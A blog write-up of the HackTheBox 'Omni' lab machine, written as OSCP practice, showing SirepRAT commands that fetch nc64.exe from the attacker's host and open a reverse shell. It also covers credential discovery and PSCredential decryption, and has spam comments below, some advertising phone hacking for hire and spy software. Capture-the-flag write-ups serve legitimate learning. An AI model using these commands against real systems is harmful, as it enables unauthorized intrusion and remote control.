OSCP PREPROTİONS – HTB Omni

Omni machine is an IoT core machine with Windows operating system which is among the retired machines. It is expected to obtain user and root flags by using vulnerabilities on this machine.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, we found that ports 135/tcp msrpc Microsoft Windows RPC, 8080/tcp upnp Microsoft IIS httpd, 5985/tcp wsman are open.
We are enumerating on port 8080

Here we are asked for credential information, we did the default password, but we could not log in successfully.
Let’s go back to nmape and look at the information given on port 8080
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn’t have a title.

We encountered Windows Device Portal, let’s see if this has a default password or something, let’s Google it

We tried the default information but it didn’t work. Let’s see if there is an exploit for this

we encountered the sirepRAT tool
SirepRAT has full RAT capabilities without the need to write a real RAT malware to the target. I dowloand this tool and run it

I didn’t understand anything in the help section here, but it is explained in detail in the github repo
Here is an example of pulling the hosts file.

As you can see here the command worked, there is also the dowloand part, if we install nc on the target machine and then run it, it will give us the shell screen.
1- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘/c powershell Invoke-WebRequest -OutFile C:\Users\Public\nc64.exe -Uri http://10.10.14.19:8000/nc64.exe’ –v

2- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘/c dir C:\Users\Public /b’ —

(here we first forwarded nc.exe but it did not run on the target system)
3- python SirepRAT.py –v 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args ‘ /c powershell.exe -command C:\Users\Public\nc64.exe -e powershell.exe 10.10.14.19 4747’

(we listened with nc in the background so that our revershell could start)
In command 1 we installed nc64 on the target machine
In command 2 we saw if nc64 was installed on the target
In command 3 we triggered nc64 to give us a revershell

After getting our shell, we typed the command “Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force” and we saw that the user flag was under /app and we got the flag. But we could not access the adminstartor user

We haven’t figured out what this flag does, so we continue with the local enumeration
We list the bat files.

Here we have credential information, let’s try to access port 8080 using this information
administrator _1nt3rn37ofTh1nGz
app mesh5143
we were able to log in using this credentail information

We provide enumeration through this interface
We tested whether the run command field works remarkably

Let’s try to give ourselves a shell again without being the default user.
We put the Nc.64 exe under public

Here we have obtained shell

We don’t understand anything from user and root flags. It may be encrypted System.Management.Automation.PSCredential Let’s google it.
https://www.travisgan.com/2015/06/powershell-password-encryption.html
I looked at the blog post at and followed the instructions here
$UserCred = Import-Clixml -Path C:\data\users\administrator\root.txt
$UserCred.GetNetworkCredential().password
I solved rootflag using commands

I tried the same commands in the user flag, but I was not successful, I thought it might be due to user ownership, we provided a connection using the app user we detected again and ran the revshell export.

This is how we got the user flag

Comments

  1. Jumaane

    You’re so cool! I don’t think I’ve truly read through anything like this before.
    So nice to find somebody with unique thoughts on this subject.
    Seriously.. many thanks for starting this up. This site is one thing that is needed on the
    internet, someone with a bit of originality!

  2. Toribio

    Its like you read my mind! You seem to know so much about
    this, like you wrote the book in it or something. I think that you can do with some pics to drive the
    message home a bit, but instead of that, this is fantastic
    blog. A great read. I’ll definitely be back.

  3. Shahana

    great issues altogether, you simply gained a brand new
    reader. What might you recommend in regards to your post
    that you made some days in the past? Any positive?

  4. Kieu

    Admiring the time and energy you put into your site and detailed information you provide.
    It’s awesome to come across a blog every once in a while that isn’t the same unwanted rehashed material.
    Fantastic read! I’ve bookmarked your site and I’m including your RSS feeds
    to my Google account.

  5. Danen

    I’ll immediately grasp your rss feed as I can’t in finding your email subscription link or e-newsletter service.

    Do you’ve any? Please permit me know so that
    I may just subscribe. Thanks.

  6. Aeisha

    Thanks for one’s marvelous posting! I certainly enjoyed reading it, you will be a great author.I will remember to bookmark your blog and definitely
    will come back down the road. I want to encourage you to
    continue your great work, have a nice morning!

  7. Rajan

    Heya this is kinda of off topic but I was wondering if blogs use WYSIWYG editors or if you have to manually
    code with HTML. I’m starting a blog soon but have no coding experience
    so I wanted to get advice from someone with experience. Any help would be enormously appreciated!

  8. Britiany

    Admiring the time and energy you put into your site and in depth
    information you present. It’s nice to come across a blog every once in a while that isn’t the same out of date rehashed material.
    Excellent read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.

  9. Annelies

    I just like the valuable information you provide to your articles.
    I will bookmark your blog and take a look at again right here regularly.
    I’m fairly certain I’ll learn lots of new stuff right here!
    Good luck for the next!

  10. Valincia

    This is really interesting, You are a very skilled blogger.
    I have joined your feed and look forward to seeking more of your magnificent post.
    Also, I’ve shared your web site in my social networks!

  11. Kane

    A person necessarily help to make seriously posts I might state.

    This is the first time I frequented your web page and up to now?
    I surprised with the research you made to make this actual post extraordinary.
    Great process!

  12. Emilia

    Hi there! Do you know if they make any plugins to protect
    against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any tips?

  13. Joye

    Excellent post. I was checking constantly this weblog and I am impressed!

    Very helpful information specifically the ultimate phase 🙂 I deal with such information much.
    I was looking for this particular info for a
    long time. Thank you and best of luck.

  14. Jesika

    Hey there! I could have sworn I’ve been to this website before but after browsing through some of the
    post I realized it’s new to me. Anyways, I’m definitely delighted I found it and I’ll be
    book-marking and checking back often!

  15. Nyema

    First off I want to say wonderful blog! I had a quick
    question in which I’d like to ask if you don’t mind.
    I was interested to know how you center yourself and clear your thoughts prior to writing.
    I’ve had a difficult time clearing my thoughts in getting my ideas out.
    I do enjoy writing however it just seems like the
    first 10 to 15 minutes are wasted just trying to figure out how to begin. Any suggestions or tips?

    Cheers!

  16. Gage

    You have made some really good points there. I checked on the internet for more
    info about the issue and found most individuals will go along with your views on this web
    site.

  17. Zina

    Hmm is anyone else experiencing problems with the images on this blog loading?

    I’m trying to find out if its a problem on my end or if it’s the blog.
    Any feed-back would be greatly appreciated.

  18. Phone Tracker Free

    When you have doubts about your children’s activities or the safety of their parents, you can hack their Android phones from your computer or mobile device to ensure their safety. No one can monitor around the clock, but there is professional spy software that can secretly monitor the activities of Android phones without making them aware.

  19. Jeffry Sienko

    I know this if off topic but I’m looking into starting my own weblog and was wondering what all is required to get set up? I’m assuming having a blog like yours would cost a pretty penny? I’m not very web smart so I’m not 100 positive. Any tips or advice would be greatly appreciated. Cheers

  20. Sugar Defender

    Thank you for some other fantastic post. The place else may anyone get that type of information in such a perfect approach of writing? I have a presentation subsequent week, and I am on the look for such information.

  21. whatsapp hackers for hire

    I am now not certain where you are getting your information, but good topic. I needs to spend a while learning much more or understanding more. Thank you for great information I used to be on the lookout for this info for my mission.

  22. Sugar defender review

    hi!,I really like your writing very much! percentage we keep up a correspondence extra approximately your post on AOL? I need a specialist in this house to resolve my problem. Maybe that’s you! Having a look forward to peer you.

  23. Fitspresso reviews

    Can I simply say what a relief to seek out somebody who really is aware of what theyre speaking about on the internet. You positively know the right way to deliver a difficulty to gentle and make it important. Extra people need to learn this and understand this side of the story. I cant imagine youre not more popular since you positively have the gift.

  24. phone hackers for hire

    Hi, just required you to know I he added your site to my Google bookmarks due to your layout. But seriously, I believe your internet site has 1 in the freshest theme I??ve came across. It extremely helps make reading your blog significantly easier.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir